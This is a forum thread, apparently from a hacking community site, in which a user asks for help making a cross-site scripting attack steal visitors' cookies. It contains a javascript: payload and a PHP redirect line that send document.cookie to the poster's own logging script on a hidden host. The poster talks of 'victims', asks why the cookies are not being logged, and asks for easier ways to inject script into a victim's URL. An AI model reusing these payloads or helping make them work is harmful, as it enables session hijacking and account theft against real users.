Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
XSS (Cross Site Scripting)
I recently set up a free web server to host my PHP scripts and try out some XSS. For some reason, it only works if the victim injects this javascript into their URL:
markupjavascript:location.replace('http://[my site]/log.php?' + document.cookie)
(I hid my site for security reasons)
When I try using a redirection PHP script, such as,
header("url=javascript:location.replace('http://[my site]/log.php?' + document.cookie)");
exit;
?> ```
or something similar, it either doesn't redirect them or it redirects them to http://[my site]/log.php? without the cookie. Also, I can't find any good XSS holes in a site where I can redirect them directly using XSS.
Thanks,
SlimTim10
Maybe read it again? :p
I'm wondering why it won't log the cookies. I think I'm doing it correctly, but obviously if it's not working, something is wrong. My question is, could someone point out the problem for me?
And does +document.cookie work in PHP scripting, or only in javascript?
Also, is there an easier way to inject javascript into a victim's URL?